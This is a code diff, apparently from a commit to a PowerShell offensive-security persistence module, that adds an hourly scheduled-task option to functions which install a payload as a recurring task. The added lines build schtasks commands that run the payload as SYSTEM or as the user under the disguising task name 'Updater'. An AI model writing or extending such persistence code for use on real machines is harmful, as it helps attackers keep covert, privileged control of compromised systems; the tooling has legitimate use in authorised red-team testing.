@@ -55,6 +55,10 @@ function New-ElevatedPersistenceOption
5555
5656 Starts the payload daily.
5757
58+ . PARAMETER Hourly
59+
60+ Starts the payload hourly.
61+
5862. PARAMETER At
5963
6064 Starts the payload at the specified time. You may specify times in the following formats: '12:31 AM', '2 AM', '23:00:00', or '4:06:26 PM'.
@@ -83,6 +87,7 @@ function New-ElevatedPersistenceOption
8387 $PermanentWMI ,
8488
8589 [Parameter ( ParameterSetName = ' ScheduledTaskDaily' , Mandatory = $True )]
90+ [Parameter ( ParameterSetName = ' ScheduledTaskHourly' , Mandatory = $True )]
8691 [Parameter ( ParameterSetName = ' ScheduledTaskAtLogon' , Mandatory = $True )]
8792 [Parameter ( ParameterSetName = ' ScheduledTaskOnIdle' , Mandatory = $True )]
8893 [Switch ]
@@ -97,6 +102,10 @@ function New-ElevatedPersistenceOption
97102 [Switch ]
98103 $Daily ,
99104
105+ [Parameter ( ParameterSetName = ' ScheduledTaskHourly' , Mandatory = $True )]
106+ [Switch ]
107+ $Hourly ,
108+
100109 [Parameter ( ParameterSetName = ' PermanentWMIDaily' , Mandatory = $True )]
101110 [Parameter ( ParameterSetName = ' ScheduledTaskDaily' , Mandatory = $True )]
102111 [DateTime ]
@@ -156,6 +165,12 @@ function New-ElevatedPersistenceOption
156165 $PersistenceOptionsTable [' Time' = $At
157166 }
158167
168+ ' ScheduledTaskHourly'
169+ {
170+ $PersistenceOptionsTable [' Method' = ' ScheduledTask'
171+ $PersistenceOptionsTable [' Trigger' = ' Hourly'
172+ }
173+
159174 ' Registry'
160175 {
161176 $PersistenceOptionsTable [' Method' = ' Registry'
@@ -214,6 +229,10 @@ function New-UserPersistenceOption
214229
215230 Starts the payload daily.
216231
232+ . PARAMETER Hourly
233+
234+ Starts the payload hourly.
235+
217236. PARAMETER At
218237
219238 Starts the payload at the specified time. You may specify times in the following formats: '12:31 AM', '2 AM', '23:00:00', or '4:06:26 PM'.
@@ -233,6 +252,7 @@ function New-UserPersistenceOption
233252
234253 [CmdletBinding ()] Param (
235254 [Parameter ( ParameterSetName = ' ScheduledTaskDaily' , Mandatory = $True )]
255+ [Parameter ( ParameterSetName = ' ScheduledTaskHourly' , Mandatory = $True )]
236256 [Parameter ( ParameterSetName = ' ScheduledTaskOnIdle' , Mandatory = $True )]
237257 [Switch ]
238258 $ScheduledTask ,
@@ -245,6 +265,10 @@ function New-UserPersistenceOption
245265 [Switch ]
246266 $Daily ,
247267
268+ [Parameter ( ParameterSetName = ' ScheduledTaskHourly' , Mandatory = $True )]
269+ [Switch ]
270+ $Hourly ,
271+
248272 [Parameter ( ParameterSetName = ' ScheduledTaskDaily' , Mandatory = $True )]
249273 [DateTime ]
250274 $At ,
@@ -285,6 +309,12 @@ function New-UserPersistenceOption
285309 $PersistenceOptionsTable [' Time' = $At
286310 }
287311
312+ ' ScheduledTaskHourly'
313+ {
314+ $PersistenceOptionsTable [' Method' = ' ScheduledTask'
315+ $PersistenceOptionsTable [' Trigger' = ' Hourly'
316+ }
317+
288318 ' Registry'
289319 {
290320 $PersistenceOptionsTable [' Method' = ' Registry'
@@ -574,6 +604,11 @@ Get-WmiObject __FilterToConsumerBinding -Namespace root\subscription | Where-Obj
574604 $ElevatedTrigger = " schtasks /Create /RU system /SC DAILY /ST $ ( $ElevatedPersistenceOption.Time.ToString (' HH:mm:ss' ) /TN Updater /TR "
575605 }
576606
607+ ' Hourly'
608+ {
609+ $ElevatedTrigger = " schtasks /Create /RU system /SC HOURLY /TN Updater /TR "
610+ }
611+
577612 ' OnIdle'
578613 {
579614 $ElevatedTrigger = " schtasks /Create /RU system /SC ONIDLE /I 1 /TN Updater /TR "
@@ -617,6 +652,11 @@ Get-WmiObject __FilterToConsumerBinding -Namespace root\subscription | Where-Obj
617652 $UserTrigger = " schtasks /Create /SC DAILY /ST $ ( $UserPersistenceOption.Time.ToString (' HH:mm:ss' ) /TN Updater /TR "
618653 }
619654
655+ ' Hourly'
656+ {
657+ $UserTrigger = " schtasks /Create /SC HOURLY /TN Updater /TR "
658+ }
659+
620660 ' OnIdle'
621661 {
622662 $UserTrigger = " schtasks /Create /SC ONIDLE /I 1 /TN Updater /TR "
0 commit comments